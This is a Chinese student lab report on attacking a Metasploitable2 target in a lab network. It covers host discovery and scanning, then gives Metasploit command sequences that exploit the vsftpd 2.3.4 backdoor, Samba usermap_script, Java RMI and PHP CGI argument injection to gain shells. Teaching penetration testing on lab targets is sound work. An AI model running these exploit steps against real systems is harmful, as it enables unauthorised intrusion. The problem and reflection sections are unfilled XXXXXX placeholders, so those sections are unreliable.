1.实验内容
1.1实验任务
-
前期渗透
- 主机发现(可用Aux中的arp_sweep,search一下就可以use)
- 端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
- 选做:也可以扫系统版本、漏洞等。
-
Vsftpd源码包后门漏洞(21端口)
-
SambaMS-RPC Shell命令注入漏洞(端口139)
-
Java RMI SERVER命令执行漏洞(1099端口)
-
PHP CGI参数执行注入漏洞(80端口)
2.实验过程
2.1 前期渗透
2.1.1主机发现
1.确认攻击机(kali)ip192.168.203.130和靶机(metasploitable2)ip192.168.203.142
2.kali中开启root权限,msfconsole进入metasploit控制台,使用search arp_sweep查找arp_sweep,可以看到搜索结果中序号0即为我们要找的,use 0进入,set RHOSTS 192.168.203.0/24设置靶机所在网段,set THREADS 20设置同时开启的线程数,run运行,可以在结果中看到靶机ip
arp_sweep 是在局域网环境中进行主机发现最根本、最有效的手段。 它不依赖于高层的网络协议,直接利用局域网通信的核心机制——ARP协议,来准确无误地找出网络中所有活跃的设备。可靠且速度快,缺点是只能用于本地局域网,无法跨路由器。
2.1.2端口扫描
1.使用metasploit中的portscan/tcp,set RHOSTS 192.168.203.142设置靶机ip,run运行
2.1.3选做:扫描系统版本、漏洞
1.使用nmap -O --script vuln 192.168.203.142命令
-O:用于扫描系统版本
--script vuln:用于启动Nmap的漏洞扫描功能。它会运行一个特定的脚本集合,专门检测目标系统上已知的安全漏洞。
系统版本如下
系统漏洞如下(节选)
2.2 Vsftpd源码包后门漏洞(21端口)
msfconsole启动metasploit,use exploit/unix/ftp/vsftpd_234_backdoor选择漏洞,set RHOST 192.168.203.142设置靶机ip,run运行
利用成功
执行uname –a、 pwd、 id等命令 验证
2.3 SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
利用步骤:
use exploit/multi/samba/usermap_script 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit 开始攻击
利用成功 执行uname–a验证
2.4 Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
操作步骤:
首先查看1099端口是否打开。
然后在MSF中:
use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set RHOST (靶机IP)
exploit/run
sessions -i id
shell (进入meterpreter时,使用whoami验证下)
2.5 PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
在kali中执行msfconsole,启动metasploit
msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit/run 开始攻击
3.问题及解决方案
-
问题1:2.2任务中第二次运行漏洞失败
![image]()
-
问题1解决方案:XXXXXX
-
问题2:XXXXXX
-
问题2解决方案:XXXXXX - ...
4.学习感悟、思考等
xxx xxx
参考资料
- 《Java程序设计与数据结构教程(第二版)》
- 《Java程序设计与数据结构教程(第二版)》学习指导
- ...